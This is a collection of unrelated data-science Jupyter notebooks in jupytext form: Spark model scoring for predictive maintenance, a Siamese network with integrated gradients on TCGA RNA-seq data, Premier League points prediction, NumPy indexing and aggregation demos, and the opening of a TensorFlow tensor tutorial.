# name: predictivemaintenance_dlvmjme
# ---
# # Step 3B: Model Scoring evaluation
#
# Using the results data set constructed in the `3b_model_scoring` Jupyter notebook, this notebook loads the data and scores the observations.
#
# **Note:** This notebook will take about 1 minutes to execute all cells, depending on the compute configuration you have setup.
# +
# import the libraries
# For some data handling
import numpy as np
from pyspark.ml import PipelineModel
# for creating pipelines and model
from pyspark.ml.feature import StringIndexer, VectorAssembler, VectorIndexer
# The scoring uses the same feature engineering script used to train the model
results_table = 'results_output'
# -
dbutils.widgets.removeAll()
dbutils.widgets.text("results_data", results_table)
# +
# make predictions. The Pipeline does all the same operations on the test data
sqlContext.refreshTable(dbutils.widgets.get("results_data"))
predictions = spark.table(dbutils.widgets.get("results_data"))
# Create the confusion matrix for the multiclass prediction results
# This result assumes a decision boundary of p = 0.5
conf_table = predictions.stat.crosstab('indexedLabel', 'prediction')
confuse = conf_table.toPandas()
confuse.head()
# -
# The confusion matrix lists each true component failure in rows and the predicted value in columns. Labels numbered 0.0 corresponds to no component failures. Labels numbered 1.0 through 4.0 correspond to failures in one of the four components in the machine. As an example, the third number in the top row indicates how many days we predicted component 2 would fail, when no components actually did fail. The second number in the second row, indicates how many days we correctly predicted a component 1 failure within the next 7 days.
#
# We read the confusion matrix numbers along the diagonal as correctly classifying the component failures. Numbers above the diagonal indicate the model incorrectly predicting a failure when none occurred, and those below indicate incorrectly predicting a non-failure for the row indicated component failure.
#
# When evaluating classification models, it is convenient to reduce the results in the confusion matrix into a single performance statistic. However, depending on the problem space, it is impossible to always use the same statistic in this evaluation. Below, we calculate four such statistics.
#
# - **Accuracy**: reports how often we correctly predicted the labeled data. Unfortunately, when there is a class imbalance (a large number of one of the labels relative to others), this measure is biased towards the largest class. In this case non-failure days.
#
# Because of the class imbalance inherent in predictive maintenance problems, it is better to look at the remaining statistics instead. Here positive predictions indicate a failure.
#
# - **Precision**: Precision is a measure of how well the model classifies the truly positive samples. Precision depends on falsely classifying negative days as positive.
#
# - **Recall**: Recall is a measure of how well the model can find the positive samples. Recall depends on falsely classifying positive days as negative.
#
# - **F1**: F1 considers both the precision and the recall. F1 score is the harmonic average of precision and recall. An F1 score reaches its best value at 1 (perfect precision and recall) and worst at 0.
#
# These metrics make the most sense for binary classifiers, though they are still useful for comparison in our multiclass setting. Below we calculate these evaluation statistics for the selected classifier, and post them back to the AML workbench run time page for tracking between experiments.
# +
# select (prediction, true label) and compute test error
# select (prediction, true label) and compute test error
# True positives - diagonal failure terms
tp = confuse['1.0'][1]+confuse['2.0'][2]+confuse['3.0'][3]+confuse['4.0'][4]
# False positves - All failure terms - True positives
fp = np.sum(np.sum(confuse[['1.0', '2.0','3.0','4.0']])) - tp
# True negatives
tn = confuse['0.0'][0]
# False negatives total of non-failure column - TN
fn = np.sum(np.sum(confuse[['0.0']])) - tn
# Accuracy is diagonal/total
acc_n = tn + tp
acc_d = np.sum(np.sum(confuse[['0.0','1.0', '2.0','3.0','4.0']]))
acc = acc_n/acc_d
# Calculate precision and recall.
prec = tp/(tp+fp)
rec = tp/(tp+fn)
# Print the evaluation metrics to the notebook
print("Accuracy = %g" % acc)
print("Precision = %g" % prec)
print("Recall = %g" % rec )
print("F1 = %g" % (2.0 * prec * rec/(prec + rec)))
print("")
# -
# Remember that this is a simulated data set. We would expect a model built on real world data to behave very differently. The accuracy may still be close to one, but the precision and recall numbers would be much lower.
predictions.toPandas().head(20)
print(predictions.summary())
predictions.explain()
# # Conclusion
#
# This concludes this scenario. You can modify these notebooks to customize your own use case solution.
|
notebooks/3b_model_scoring_evaluation.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: torch
# language: python
# name: torch
# ---
# +
import numpy as np
import pandas as pd
np.random.seed(123)
# viz
import matplotlib.pyplot as plt
# notebook settings
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = "all"
pd.set_option('display.max_columns', 1000)
# -
# ## Sample Prep
samples = pd.read_csv('../data/TCGA/rna-seq_pan/meta/gdc_sample_sheet.2019-12-12.tsv', sep="\t")
# get file type
samples['data'] = [val[1] for i,val in samples['File Name'].str.split(".").items()]
samples.head()
# Samples with RNAseq adjacent normal tissue
samples[samples['Sample Type']=='Solid Tissue Normal']['data'].value_counts()
samples['project'] = [val[1] for i,val in samples['Project ID'].str.split("-").items()]
samples['project'].value_counts()
# all cases with adjacent normal tissue
cases = samples[samples['Sample Type']=='Solid Tissue Normal']['Case ID']
# disparity in cases
samples[(samples['Case ID'].isin(cases)) & (samples['Sample Type']=='Primary Tumor')
& (samples['data']=='FPKM') & (samples['project']=='BRCA')]['Case ID'].nunique()
samples[(samples['Case ID'].isin(cases)) & (samples['Sample Type']=='Solid Tissue Normal')
& (samples['data']=='FPKM') & (samples['project']=='BRCA')]['Case ID'].nunique()
# divide, join, subset
case_tumor = samples[(samples['Case ID'].isin(cases)) & (samples['Sample Type']=='Primary Tumor') &
(samples['data']=='FPKM') & (samples['project']=='BRCA')]
case_norm = samples[(samples['Case ID'].isin(cases)) & (samples['Sample Type']=='Solid Tissue Normal') &
(samples['data']=='FPKM') & (samples['project']=='BRCA')]
#cases = case_norm[case_norm['Case ID'].isin(case_tumor['Case ID'])]['Case ID']
cases = pd.merge(case_tumor['Case ID'], case_norm['Case ID'])['Case ID']
cases.shape
case_tumor = case_tumor[case_tumor['Case ID'].isin(cases)]
case_norm = case_norm[case_norm['Case ID'].isin(cases)]
cases = pd.concat([case_tumor, case_norm])
case_tumor.shape
case_norm.shape
cases.shape
# ## Dataset Prep
# +
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
target = 'Sample Type'
cases[target] = cases[target].astype('category')
train, test = train_test_split(cases)
train[target].value_counts()
test[target].value_counts()
# +
import torch
from torch.optim import lr_scheduler
import torch.optim as optim
from torch.autograd import Variable
torch.manual_seed(123)
from trainer import fit
import visualization as vis
import numpy as np
cuda = torch.cuda.is_available()
print("Cuda is available: {}".format(cuda))
classes = {key:val for val,key in enumerate(train[target].cat.categories.values)}
classes
# +
from tcga_datasets import TCGA, SiameseTCGA
root_dir = "../data/TCGA/rna-seq_pan/"
batch_size = 1
train_dataset = TCGA(root_dir, samples=train, train=True, target=target, norm=False)
test_dataset = TCGA(root_dir, samples=test, train=False, target=target, norm=False)
scaler = StandardScaler()
train_dataset.data = pd.DataFrame(scaler.fit_transform(train_dataset.data),
index=train_dataset.data.index,
columns=train_dataset.data.columns)
test_dataset.data = pd.DataFrame(scaler.transform(test_dataset.data),
index=test_dataset.data.index,
columns=test_dataset.data.columns)
kwargs = {'num_workers': 10, 'pin_memory': True} if cuda else {'num_workers': 10}
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, shuffle=True, **kwargs)
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False, **kwargs)
# -
# ## Siamese Network
# +
# Step 1 set up dataloader
root_dir = "../data/TCGA"
siamese_train_dataset = SiameseTCGA(train_dataset) # Returns pairs of images and target same/different
siamese_test_dataset = SiameseTCGA(test_dataset)
batch_size = 8
kwargs = {'num_workers': 10, 'pin_memory': True} if cuda else {}
siamese_train_loader = torch.utils.data.DataLoader(siamese_train_dataset, batch_size=batch_size, shuffle=True, **kwargs)
siamese_test_loader = torch.utils.data.DataLoader(siamese_test_dataset, batch_size=batch_size, shuffle=False, **kwargs)
# Set up the network and training parameters
from tcga_networks import EmbeddingNet, SiameseNet
from losses import ContrastiveLoss
from metrics import AccumulatedAccuracyMetric
# Step 2
embedding_net = EmbeddingNet()
# Step 3
model = SiameseNet(embedding_net)
if cuda:
model.cuda()
# Step 4
margin = 1.
loss_fn = ContrastiveLoss(margin)
lr = 1e-3
optimizer = optim.Adam(model.parameters(), lr=lr)
scheduler = lr_scheduler.StepLR(optimizer, 8, gamma=0.1, last_epoch=-1)
n_epochs = 20
# print training metrics every log_interval * batch_size
log_interval = 30
# -
train_loss, val_loss = fit(siamese_train_loader, siamese_test_loader, model, loss_fn, optimizer, scheduler,
n_epochs, cuda, log_interval)
plt.plot(range(0, n_epochs), train_loss, 'rx-')
plt.plot(range(0, n_epochs), val_loss, 'bx-')
train_embeddings_cl, train_labels_cl = vis.extract_embeddings(train_loader, model)
vis.plot_embeddings(train_embeddings_cl, train_labels_cl, siamese_train_dataset.labels_dict)
val_embeddings_baseline, val_labels_baseline = vis.extract_embeddings(test_loader, model)
vis.plot_embeddings(val_embeddings_baseline, val_labels_baseline, siamese_test_dataset.labels_dict)
# ## Integrated Gradients
# Test completeness axiom through comparison of different baselines
#
# "Integrated gradients satisfy an
# axiom called completeness that the attributions add up to
# the difference between the output of F at the input x and
# the baseline x'."
import copy
from captum.attr import LayerActivation
from captum.attr import IntegratedGradients
tmp_model = copy.deepcopy(model)
tmp_model
def attribution_pairs(SiameseTCGA, exp, ctrl):
    """Extract control/experiment sample tensors from a Siamese test dataset.

    Parameters:
        SiameseTCGA: dataset exposing ``test_pairs`` (rows of
            ``[idx_a, idx_b, same_flag]``), ``labels_dict`` (label name ->
            int), ``label_to_indices`` (int label -> sample indices) and
            ``test_data`` (indexable tensor of samples).
        exp, ctrl: label names of the experiment and control classes.

    Returns:
        (ctrl_data, exp_data): Variables with ``requires_grad=True`` holding
        the control and experiment samples drawn from "different"
        (``same_flag == 0``) pairs, in pair order.
    """
    # subset different samples (flag 0 marks a negative, i.e. mixed-label, pair)
    negative_pairs = np.array(SiameseTCGA.test_pairs)
    negative_pairs = negative_pairs[negative_pairs[:,2] == 0]
    # map labels to integers.
    # Fix: the original looked these up on the *global* `siamese_test_dataset`
    # instead of the SiameseTCGA parameter, so the function only worked for
    # that one dataset; use the argument so any dataset can be passed.
    ctrl = SiameseTCGA.labels_dict[ctrl]
    exp = SiameseTCGA.labels_dict[exp]
    # ordered indices of samples belonging to each class within the pairs
    ctrl_data = [idx for pair in negative_pairs[:, :2] for idx in pair if np.isin(idx, SiameseTCGA.label_to_indices[ctrl])]
    exp_data = [idx for pair in negative_pairs[:, :2] for idx in pair if np.isin(idx, SiameseTCGA.label_to_indices[exp])]
    # gather the actual sample tensors, tracked for gradient attribution
    ctrl_data = Variable(SiameseTCGA.test_data[ctrl_data], requires_grad=True)
    exp_data = Variable(SiameseTCGA.test_data[exp_data], requires_grad=True)
    return ctrl_data, exp_data
# ### IG with Control vector
ctrl_data, exp_data = attribution_pairs(siamese_test_dataset, exp='Primary Tumor', ctrl='Solid Tissue Normal')
ig = IntegratedGradients(tmp_model.get_embedding)
attr, delta = ig.attribute(exp_data.cuda(), ctrl_data.cuda(), target=0, n_steps=50, return_convergence_delta=True)
attr = attr.cpu().detach().numpy()
attr.shape
feat_imp = pd.DataFrame(data=attr.mean(axis=0), index=train_dataset.data.columns, columns=['Attribution'])
feat_imp.hist(bins=100)
feat_imp.describe()
feat_imp.nlargest(10, columns='Attribution')
# ### Test completeness axiom
# - Euclidean Distance between samples
# - feature attribution sum
# - difference between
# +
pdist = torch.nn.PairwiseDistance(p=2)
outdist = pdist(exp_data, ctrl_data)
diff = np.round(outdist.detach().numpy() - attr.sum(axis=1), 3)
diff.mean(); np.median(diff); diff.var()
# -
# #### Inspect individual sample attributions
for i in range(len(attr)):
attr_samp = pd.Series(attr[i], index=train_dataset.data.columns)
attr_samp.nlargest(10)
for i in range(len(attr)):
attr_samp = pd.Series(attr[i], index=train_dataset.data.columns)
attr_samp.nsmallest(10)
# #### Check embedding of zero-feature vector
base_zero = torch.zeros(siamese_test_dataset.test_data.shape[1]).cuda()
base_emb = model.get_embedding(base_zero)
base_emb
# #### Check loss of baseline vectors
# - control data
# - zero vector
# - random values
target = torch.tensor(0, dtype=float)
model.get_loss(ctrl_data.cuda(), exp_data.cuda(), target, ContrastiveLoss(margin))
base_zero = torch.zeros(exp_data.shape).cuda()
model.get_loss(base_zero, exp_data.cuda(), target, ContrastiveLoss(margin))
rand_base = torch.rand_like(exp_data).cuda()
model.get_loss(rand_base, exp_data.cuda(), target, ContrastiveLoss(margin))
# ### IG with zero-feature vector
attr, delta = ig.attribute(exp_data.cuda(), target=0, n_steps=50, return_convergence_delta=True)
attr = attr.cpu().detach().numpy()
attr.shape
feat_imp = pd.DataFrame(data=attr.mean(axis=0), index=train_dataset.data.columns, columns=['Attribution'])
feat_imp.hist(bins=100)
feat_imp.describe()
feat_imp.nlargest(10, columns='Attribution')
# +
pdist = torch.nn.PairwiseDistance(p=2)
outdist = pdist(exp_data, ctrl_data)
diff = np.round(outdist.detach().numpy() - attr.sum(axis=1), 3)
diff.mean(); np.median(diff); diff.var()
# -
for i in range(len(attr)):
attr_samp = pd.Series(attr[i], index=train_dataset.data.columns)
attr_samp.nlargest(10)
|
notebook/2020.01.27_converging-model.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Premier League Prediction using Machine Learning
# ### Importing Libraries
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
#Extracting data
dataset=pd.read_excel('MainData.xlsx')
dataset2=pd.read_excel('PL_2019-20.xlsx')
dataset.head()
dataset.shape
dataset.describe()
dataset.index
dataset.info()
dataset.isna().sum()
# +
#Filling NAN values
dataset['GD'] = dataset['GF']-dataset['GA']
dataset2['GD'] = dataset2['GF']-dataset2['GA']
# -
dataset.head()
# +
# Filling NAN values in Xg GD
dataset['Xg GD'] = dataset['Expected Goals (Xg)']-dataset['Xg Conceded']
dataset2['Xg GD'] = dataset2['Expected Goals (Xg)']-dataset2['Xg Conceded']
# -
dataset.head()
# # Data Analysis
# Teams with most wins, draws and losses
sns.barplot(x='W', y='Name', data=dataset)
y = dataset['D']
x = dataset['Name']
plt.bar(x,y)
plt.xlabel("Teams")
plt.grid()
plt.xticks(rotation = 80)
plt.ylabel("goals")
plt.title("D vs Teams")
plt.show()
sns.barplot(x='L', y='Name', data=dataset)
# #### Attacking Analysis
sns.barplot(data=dataset, y='Name', x='GF').set(title='Goals Scored')
#plt.xticks(rotation=70)
plt.tight_layout()
sns.barplot(data=dataset, x='Name', y='Expected Goals (Xg)').set(title='Expected Goals')
plt.xticks(rotation=70)
plt.tight_layout()
# Difference between Goals scored and Xg to determine which team overperformed and which team underperformed in attack
dataset['GF_minus_Xg'] = dataset['GF']-dataset['Expected Goals (Xg)']
dataset.head()
dataset.plot(x="Name", y=["GF","Expected Goals (Xg)"], kind="bar",figsize=(9,8))
# ##### Defending Analysis
sns.barplot(data=dataset, x='Name', y='GA').set(title='Goals Conceded')
plt.xticks(rotation=70)
plt.tight_layout()
sns.barplot(data=dataset, y='Name', x='Xg Conceded').set(title='Expected Goals Conceded')
#plt.xticks(rotation=70)
plt.tight_layout()
# Difference between Goals scored and Xg to determine which team overperformed and which team underperformed in attack
dataset['GA_minus_Xa'] = dataset['GA']-dataset['Xg Conceded']
dataset.head()
dataset.plot(x="Name", y=["GA","Xg Conceded"], kind="bar",figsize=(9,8))
# Top 5 teams Possession Distribution
newdf = dataset.head()
plt.pie(newdf['Possession'], labels = newdf['Name'],startangle=100, shadow = False, explode = (0.1, 0.1, 0.1, 0.1,0.1), autopct = "%.1f%%")
plt.grid()
#plt.xticks(rotation=40)
plt.title("Average possession")
plt.axis("equal")
plt.show()
# ##### Chances created vs Chances missed
dataset.plot(x="Name", y=["Big Chances Created","Big Chances Missed"], kind="bar",figsize=(9,8))
# #### Goal Difference vs Expected Goal Difference
#
# Expected Goal Difference Xg GD = Xg - Xa
dataset.plot(x="Name", y=["GD","Xg GD"], kind="bar",figsize=(9,8))
dataset['GD_minus_XgD'] = dataset['GD'] - dataset['Xg GD']
dataset.head()
# Clean Sheets vs Saves Per Match Scatter plot
sns.relplot(x="Saves per Match", y="CLS", hue = 'Name',kind = 'scatter',data=dataset)
plt.show()
sns.barplot(x='Red Cards', y='Name', data=dataset)
# #### Home Wins vs Loss Percentage
dataset['Home Win%'] = (dataset['Home W']/(dataset['PM']/2))*100
dataset['Home Loss%'] = (dataset['Home L']/(dataset['PM']/2))*100
dataset['Home D%'] = (((dataset['PM']/2) -(dataset['Home W']+dataset['Home L']))/(dataset['PM']/2))*100
dataset.head()
dataset.plot(x="Name", y=["Home Win%","Home Loss%" ,"Home D%"], kind="bar",figsize=(9,8))
# Adding Total Points in this Dataset
dataset['Points'] = dataset['W']*3 + dataset['D']
dataset2['Points'] = dataset2['W']*3 + dataset2['D']
dataset.head()
# ### Finding Correlation between Pairs and Variables using Correlation Matrix
newdf2 = dataset.copy()
newdf2.drop(['PM','D','GF','GA','Expected Goals (Xg)','Xg Conceded','Big Chances Missed'],axis = 1, inplace = True)
newdf2.drop(['GD_minus_XgD','GF_minus_Xg','GA_minus_Xa','Red Cards', 'Saves per Match','Home W','Away W', 'Home L','Home Win%','Home D%','Home Loss%'],axis = 1, inplace = True)
newdf2.head()
# +
### Correlation matrix implementation
corr_mat=newdf2.corr()
sns.heatmap(corr_mat, annot=True)
# -
# # Data Preprocessing
# Bottom 3 Teams Got Relegated so we Won't be using their Data as they won't be in the league this season
dataset.drop(['GD_minus_XgD','GF_minus_Xg','GA_minus_Xa', 'GD_minus_XgD','Home W','Away W', 'Home L','Home Win%','Home D%','Home Loss%'],axis = 1, inplace = True)
dataset.head()
dataset2
# +
#mc = dataset.iloc[0,:]
#mu = dataset.iloc[1,:]
#liv = dataset.iloc[2,:]
#chel = dataset.iloc[3,:]
#lei = dataset.iloc[4,:]
#whu = dataset.iloc[5,:]
#tot = dataset.iloc[6,:]
#ars = dataset.iloc[7,:]
#leeds = dataset.iloc[8,:]
#eve = dataset.iloc[9,:]
#asv = dataset.iloc[10,:]
#new = dataset.iloc[11,:]
#wol = dataset.iloc[12,:]
#cp = dataset.iloc[13,:]
#sthm = dataset.iloc[14,:]
#brh = dataset.iloc[15,:]
#bur = dataset.iloc[16,:]
#ful = dataset.iloc[17,:]
#wbrom = dataset.iloc[18,:]
#sheff = dataset.iloc[19,:]
# -
#mc.drop(labels = ['Name','Points'],inplace = True)
#mu.drop(labels = ['Name','Position'],inplace = True)
#liv.drop(labels = ['Name','Position'],inplace = True)
#chel.drop(labels = ['Name','Position'],inplace = True)
#lei.drop(labels = ['Name','Position'],inplace = True)
#whu.drop(labels = ['Name','Position'],inplace = True)
#tot.drop(labels = ['Name','Position'],inplace = True)
#ars.drop(labels = ['Name','Position'],inplace = True)
#leeds.drop(labels = ['Name','Position'],inplace = True)
#eve.drop(labels = ['Name','Position'],inplace = True)
#asv.drop(labels = ['Name','Position'],inplace = True)
#new.drop(labels = ['Name','Position'],inplace = True)
#wol.drop(labels = ['Name','Position'],inplace = True)
#cp.drop(labels = ['Name','Position'],inplace = True)
#sthm.drop(labels = ['Name','Position'],inplace = True)
#brh.drop(labels = ['Name','Position'],inplace = True)
#bur.drop(labels = ['Name','Position'],inplace = True)
#ful.drop(labels = ['Name','Position'],inplace = True)
#wbrom.drop(labels = ['Name','Position'],inplace = True)
#sheff.drop(labels = ['Name','Position'],inplace = True)
# ### Concatenation of dataset and dataset2
dataset2['Position'] = [3,1,2,4,5,7,13,8,20,17,15,10,12,14,16,6,11,9,18,19]
dataset2 = dataset2.sort_values(by = ['Position'], ascending = True)
dataset2.reset_index(drop = True,inplace = True)
dataset2['Name'].replace("Bournemouth", "Leeds United", inplace = True)
# Rename relegated/promoted clubs so the two season tables share the same 20
# team names (assumes `dataset` and `dataset2` are two consecutive seasons of
# Premier League tables loaded earlier in the notebook -- TODO confirm).
# NOTE(review): calling `.replace(..., inplace=True)` on a selected column can
# raise a pandas SettingWithCopyWarning and may not modify the parent frame.
dataset2['Name'].replace("Sheffield United", "Brentford", inplace = True)
dataset['Name'].replace("Sheffield United", "Brentford", inplace = True)
dataset['Name'].replace("West Brom", "Watford", inplace = True)
# Keep the (renamed) club names aside: groupby().mean() below drops string columns.
array =dataset2['Name']
# Average the two seasons' numeric stats per league position.
df = pd.concat([dataset, dataset2]).groupby('Position', as_index=False).mean()
# Re-attach the club names to the averaged table.
df['Name'] = array
# Reorder columns for readability.
df = df[['Position','Name','PM','W','D','L','GF','GA','GD','CLS','Possession','Expected Goals (Xg)','Xg Conceded','Xg GD','Saves per Match','Big Chances Created','Big Chances Missed','Red Cards','xPTS','Points']]
# Rank by the averaged points total and renumber positions 1..20.
df = df.sort_values(by = ['Points'], ascending = False)
df["Position"] = np.arange(1,21,1)
df.head()
df
# ### Data Splitting
# Target: season points. Features: everything except identifiers and columns
# that directly leak the target (goals for/against, xG for/against, red cards).
y = dataset2['Points']
x = dataset2.drop(['Name','Points','Position','GF','GA','Expected Goals (Xg)','Xg Conceded','Red Cards'],axis = 1)
from sklearn import model_selection
# Train on 45% of `dataset2`; fixed random_state keeps the split reproducible.
x_train,x_test,y_train,y_test = model_selection.train_test_split(x,y, train_size=0.45, random_state=0)
from sklearn.linear_model import LinearRegression
algo1 = LinearRegression()
algo1.fit(x_train,y_train)
# ###### Splitting data for evaluation
# Evaluate on the other season (`dataset`), which was never used for training.
x_test_for_eval = dataset.drop(['Name','Points','Position','GF','GA','Expected Goals (Xg)','Xg Conceded','Red Cards'],axis = 1)
y_test_for_eval = dataset['Points']
# ##### Predicting for evaluation
y_predicted_for_eval = algo1.predict(x_test_for_eval)
y_predicted_for_eval
# ## Model Evaluation
# R^2 on the training split, printed as a percentage.
tra_data_pred = algo1.predict(x_train)
from sklearn import metrics
r2_train = metrics.r2_score(y_train,tra_data_pred)
print(r2_train*100)
# R^2 on the held-out season, printed as a percentage.
from sklearn import metrics
r2_test = metrics.r2_score(y_test_for_eval,y_predicted_for_eval)
print(r2_test*100)
import matplotlib.pyplot as plt
# Scatter of actual vs. predicted points with the ideal y = x line in red:
# points on the line are perfect predictions.
m = 1
c = 0
x_line = np.arange(15,90,5)
y_line = m*x_line + c
plt.plot(x_line,y_line,'r')
plt.scatter(y_test_for_eval , y_predicted_for_eval)
plt.show()
# # Final Prediction
# Predict points for the two-season averaged table built above.
x_for_df_pred = df.drop(['Name','Points','Position','GF','GA','Expected Goals (Xg)','Xg Conceded','Red Cards'],axis = 1)
df['Predicted Points'] = algo1.predict(x_for_df_pred)
# +
#df.head()
# -
# Re-rank by predicted points, renumber positions, keep only
# Position / Name / Predicted Points, and round predictions up to whole points.
df = df.sort_values(by = ['Predicted Points'], ascending = False)
df["Position"] = np.arange(1,21,1)
df.drop(['xPTS','PM','GF','W','L','D','GA','GD','CLS','Xg GD','Points','Expected Goals (Xg)','Possession','Xg Conceded','Xg GD','Saves per Match','Big Chances Created','Big Chances Missed','Red Cards'],axis = 1, inplace = True)
df['Predicted Points'] = df['Predicted Points'].apply(np.ceil)
df
# Top 4 teams from this table will qualify for top 4 according to our prediction including man city, man united, liverpool, chelsea.
#
# 5th and 6th position teams will qualify for europa league including leicester city and arsenal.
#
# 7th and 8th position teams will qualify for the new uefa conference league including tottenham and wolves.
# Bottom 3 will get relegated to lower leagues according to our prediction including brentford, Watford, Norwich
# ##### Saving Our Prediction in csv format
df.to_csv('PL_2021-22_Predicted.csv', index=False)
|
Working of PL_Prediciton_using_ML/Premier_League_Table_Prediction.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # NDAP: In-class demos and notes
# For 9.24.2018.
#
# ## Binary (boolean) indexing & caution
import numpy as np
arr = np.array([-10, 15, 12, 45])
arr
# A boolean mask selects the elements where the mask is True.
binary_inds = np.array([True, False, False, True])
arr[binary_inds]
# The same 0/1 values as *integers* are fancy indexing: they pick the
# elements AT indices 1, 0, 0, 1 -- not a mask!
integer_inds = np.array([1, 0, 0, 1])
arr[integer_inds]
# this gives the weird and ridiculous result
# not something we want
# summing booleans treats True as 1 and False as 0
sum(binary_inds), sum(integer_inds)
# ## Aggregation
# using numpy's sum method for aggregation
binary_inds.sum()
new_arr = np.array([-1, 15, 4.3, 22, -247])
new_arr
# the minimum
print(new_arr.min())
# or
print(np.min(new_arr))
new_arr.max()
# argmin gives you the index of the smallest element
new_arr.argmin()
# argmax gives you the index of the largest element
new_arr.argmax()
# ### Aggregation over multi-dimensional arrays treats the array as a single list of numbers
# A random 3x4x5 array of values drawn uniformly from [0, 1).
multidarr = np.random.rand(3,4,5)
multidarr
multidarr.shape
# a single number, the minimum over the whole array!
multidarr.min()
multidarr.sum()
# ### Adding an "axis" parameter aggregates across one dimension of the array
demo_arr = np.array([[0,3,5],[1,2,-1]])
demo_arr
# we can get the minimum of just the first column by indexing and then aggregating
demo_arr[:,0].min()
# we can get the minimum over the whole array
demo_arr.min()
# using axis=0 aggregates ACROSS ROWS (we get one value for each column)
demo_arr.min(axis=0)
# using axis=1 aggregates ACROSS COLUMNS (we get one value for each row)
demo_arr.min(axis=1)
# aside:
# taking argmin of a multi-dimensional array gives you the index of the smallest element
# IN THE FLATTENED ARRAY. this is kind of weird and should probably be avoided most of
# the time
demo_arr.argmin() # index into flattened array!
# this gives the index of the smallest element across rows (i.e. in each column)
demo_arr.argmin(axis=0)
# same, but across columns (i.e. in each row)
demo_arr.argmin(axis=1)
# argmin with a repeated element still only returns one index: the first one!
np.argmin([0, 1, 2, 3, 0]) # returns the first index!
demo_arr.shape
# aggregation over an axis REMOVES THAT AXIS FROM THE ARRAY
# e.g. shape (2, 3): min over axis=0 -> (3,), min over axis=1 -> (2,)
demo_arr.min(axis=0).shape
demo_arr.min(axis=1).shape
big_demo_arr = np.zeros((2, 6, 3, 4, 9))
big_demo_arr.shape
# removing axis 2 (length 3) leaves shape (2, 6, 4, 9)
big_demo_arr.min(axis=2).shape
|
lecture11_numpy_contd/Lecture11-demos.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:nlp_tf2]
# language: python
# name: conda-env-nlp_tf2-py
# ---
# + [markdown] colab_type="text" id="Tce3stUlHN0L"
# ##### Copyright 2020 The TensorFlow Authors.
# + cellView="form" colab={} colab_type="code" id="tuOe1ymfHZPu"
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# + [markdown] colab_type="text" id="qFdPvlXBOdUN"
# # Introduction to Tensors
# + [markdown] colab_type="text" id="MfBg1C5NB3X0"
# <table class="tfo-notebook-buttons" align="left">
# <td>
# <a target="_blank" href="https://www.tensorflow.org/guide/tensor"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a>
# </td>
# <td>
# <a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/guide/tensor.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
# </td>
# <td>
# <a target="_blank" href="https://github.com/tensorflow/docs/blob/master/site/en/guide/tensor.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on GitHub</a>
# </td>
# <td>
# <a href="https://storage.googleapis.com/tensorflow_docs/docs/site/en/guide/tensor.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a>
# </td>
# </table>
# + colab={} colab_type="code" id="AL2hzxorJiWy"
import tensorflow as tf
import numpy as np
tf.__version__
# + [markdown] colab_type="text" id="VQ3s2J8Vgowq"
# Tensors are multi-dimensional arrays with a uniform type (called a `dtype`). You can see all supported `dtypes` at `tf.dtypes.DType`.
#
# If you're familiar with [NumPy](https://numpy.org/devdocs/user/quickstart.html), tensors are (kind of) like `np.arrays`.
#
# All tensors are immutable like python numbers and strings: you can never update the contents of a tensor, only create a new one.
#
# + [markdown] colab_type="text" id="DRK5-9EpYbzG"
# ## Basics
#
# Let's create some basic tensors.
# + [markdown] colab_type="text" id="uSHRFT6LJbxq"
# Here is a "scalar" or "rank-0" tensor . A scalar contains a single value, and no "axes".
# + colab={} colab_type="code" id="d5JcgLFR6gHv"
# This will be an int32 tensor by default; see "dtypes" below.
rank_0_tensor = tf.constant(4)
print(rank_0_tensor)
# + [markdown] colab_type="text" id="tdmPAn9fWYs5"
# A "vector" or "rank-1" tensor is like a list of values. A vector has 1-axis:
# + colab={} colab_type="code" id="oZos8o_R6oE7"
# Let's make this a float tensor.
rank_1_tensor = tf.constant([2.0, 3.0, 4.0])
print(rank_1_tensor)
# + [markdown] colab_type="text" id="G3IJG-ug_H4u"
# A "matrix" or "rank-2" tensor has 2-axes:
# + colab={} colab_type="code" id="cnOIA_xb6u0M"
# If we want to be specific, we can set the dtype (see below) at creation time
rank_2_tensor = tf.constant([[1, 2],
[3, 4],
[5, 6]], dtype=tf.float16)
print(rank_2_tensor)
# + [markdown] colab_type="text" id="19m72qEPkfxi"
# <table>
# <tr>
# <th>A scalar, shape: <code>[]</code></th>
# <th>A vector, shape: <code>[3]</code></th>
# <th>A matrix, shape: <code>[3, 2]</code></th>
# </tr>
# <tr>
# <td>
# <img src="images/tensor/scalar.png" alt="A scalar, the number 4" />
# </td>
#
# <td>
# <img src="images/tensor/vector.png" alt="The line with 3 sections, each one containing a number."/>
# </td>
# <td>
# <img src="images/tensor/matrix.png" alt="A 3x2 grid, with each cell containing a number.">
# </td>
# </tr>
# </table>
#
# + [markdown] colab_type="text" id="fjFvzcn4_ehD"
